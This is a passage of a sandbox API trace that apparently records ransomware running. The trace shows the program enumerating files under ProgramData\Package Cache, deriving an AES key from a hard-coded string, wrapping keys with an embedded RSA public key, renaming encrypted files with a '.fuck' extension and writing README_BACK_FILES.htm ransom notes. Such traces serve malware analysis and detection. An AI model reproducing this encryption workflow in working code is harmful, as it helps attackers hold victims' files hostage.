pbData=0x2859bf0*, pdwDataLen=0x2b9e064*=0x80) returned 1 [0238.033] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2859bf0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.033] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e074, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9e074*=0x0, lpOverlapped=0x0) returned 0 [0238.033] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.033] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.033] CloseHandle (hObject=0xffffffff) returned 1 [0238.033] CloseHandle (hObject=0xffffffff) returned 1 [0238.033] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), bFailIfExists=0) returned 0 [0238.033] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", dwFileAttributes=0x0) returned 0 [0238.033] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.gsg")) returned 0 [0238.033] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.fuck" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.fuck")) returned 0 [0238.034] CryptDestroyHash (hHash=0x2816f58) returned 1 [0238.034] CryptDestroyKey (hKey=0x2817858) returned 1 [0238.034] CryptReleaseContext (hProv=0x2858160, dwFlags=0x0) returned 1 [0238.034] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.034] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.034] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0238.034] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\readme_back_files.htm")) returned 0xffffffff [0238.034] AreFileApisANSI () returned 1 [0238.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x282dfd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0238.034] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.034] GetLastError () returned 0x5 [0238.034] GetLastError () returned 0x5 [0238.034] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.035] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2845de0 [0238.035] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.035] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.035] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845ea0 [0238.035] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.035] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.036] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28469e0 [0238.036] FindNextFileA (in: hFindFile=0x28469e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.036] FindNextFileA (in: hFindFile=0x28469e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.036] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.036] GetLastError () returned 0x5 [0238.036] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0238.036] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.037] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.037] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.037] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.037] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2859040) returned 1 [0238.039] CryptCreateHash (in: hProv=0x2859040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.039] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.039] CryptHashData (hHash=0x28467e0, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.039] CryptDeriveKey (in: hProv=0x2859040, Algid=0x6610, hBaseData=0x28467e0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2816f58) returned 1 [0238.039] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.039] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.039] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28590c8) returned 1 [0238.040] CryptImportPublicKeyInfo (in: hCryptProv=0x28590c8, dwCertEncodingType=0x1, pInfo=0x2868f78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2868fa8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2868fb0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817098) returned 1 [0238.040] CryptEncrypt (in: hKey=0x2817098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.040] CryptEncrypt (in: hKey=0x2817098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859150*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2859150*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.040] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2859150, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.040] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.040] CryptEncrypt (in: hKey=0x2816f58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.040] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.040] CloseHandle (hObject=0xffffffff) returned 1 [0238.040] CloseHandle (hObject=0xffffffff) returned 1 [0238.040] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0238.041] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.041] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.gsg")) returned 0 [0238.041] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.fuck")) returned 0 [0238.041] CryptDestroyHash (hHash=0x28467e0) returned 1 [0238.041] CryptDestroyKey (hKey=0x2816f58) returned 1 [0238.041] CryptReleaseContext (hProv=0x2859040, dwFlags=0x0) returned 1 [0238.041] FindNextFileA (in: hFindFile=0x28469e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.041] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.041] GetLastError () returned 0x5 [0238.041] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0238.042] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0238.042] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.042] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.042] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.043] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2858f30) returned 1 [0238.045] CryptCreateHash (in: hProv=0x2858f30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.045] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.045] CryptHashData (hHash=0x2817298, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.045] CryptDeriveKey (in: hProv=0x2858f30, Algid=0x6610, hBaseData=0x2817298, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817858) returned 1 [0238.045] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.045] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.045] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2858fb8) returned 1 [0238.046] CryptImportPublicKeyInfo (in: hCryptProv=0x2858fb8, dwCertEncodingType=0x1, pInfo=0x2869118*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2869148*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2869150*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2716c68) returned 1 [0238.046] CryptEncrypt (in: hKey=0x2716c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.046] CryptEncrypt (in: hKey=0x2716c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2859040*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2859040*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.046] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2859040, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.046] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.046] CryptEncrypt (in: hKey=0x2817858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.046] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.046] CloseHandle (hObject=0xffffffff) returned 1 [0238.046] CloseHandle (hObject=0xffffffff) returned 1 [0238.047] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), bFailIfExists=0) returned 0 [0238.047] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x0) returned 0 [0238.047] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg")) returned 0 [0238.047] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.fuck" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.fuck")) returned 0 [0238.048] CryptDestroyHash (hHash=0x2817298) returned 1 [0238.048] CryptDestroyKey (hKey=0x2817858) returned 1 [0238.048] CryptReleaseContext (hProv=0x2858f30, dwFlags=0x0) returned 1 [0238.048] FindNextFileA (in: hFindFile=0x28469e0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.048] FindClose (in: hFindFile=0x28469e0 | out: hFindFile=0x28469e0) returned 1 [0238.048] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm")) returned 0xffffffff [0238.048] AreFileApisANSI () returned 1 [0238.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2852670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 137 [0238.048] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.048] GetLastError () returned 0x5 [0238.048] GetLastError () returned 0x5 [0238.048] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.048] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0238.048] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.049] AreFileApisANSI () returned 1 [0238.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2c10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.049] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.049] GetLastError () returned 0x5 [0238.049] GetLastError () returned 0x5 [0238.049] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.049] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0238.049] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\readme_back_files.htm")) returned 0xffffffff [0238.049] AreFileApisANSI () returned 1 [0238.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.049] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.050] GetLastError () returned 0x5 [0238.050] GetLastError () returned 0x5 [0238.050] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.050] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27175e8 [0238.051] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.051] FindNextFileA (in: 